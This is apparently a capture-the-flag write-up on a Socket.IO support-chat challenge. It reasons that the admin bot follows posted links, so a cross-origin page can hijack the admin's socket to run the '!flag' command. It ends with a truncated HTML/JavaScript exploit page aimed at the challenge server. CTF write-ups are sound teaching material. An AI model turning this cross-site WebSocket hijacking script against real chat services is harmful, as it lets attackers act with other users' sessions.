Tags: socket.io csrf web

Rating:

Then, we are presented with a chatbot:

text
Bot: Welcome to the support chat! An admin will be assisting you.


If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the room that is sent to the server) does not work since it looks like the server validates our cookie before it lets us join.

Now, let's try enumerate the things that the chatbot lets us do

We try to spam some random things:
text
User: random


We also notice that there is a !flag command:

text
User: !flag
Bot: Only the admin can run that command from our office


This implies that part of the vulnerability will involve some kind of XSS or CSRF.

After trying a few random guesses, we notice that putting a link in causes the admin to try to visit that link:
text
User: https://example.com
Admin: I am looking into https://example.com give me a moment...


Thus, the vulnerability is probably something to do with CSRF.

We can try just connecting to the Socket.IO server from another origin, which does work.

So now all we need to do is to host a script that runs !flag:

<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {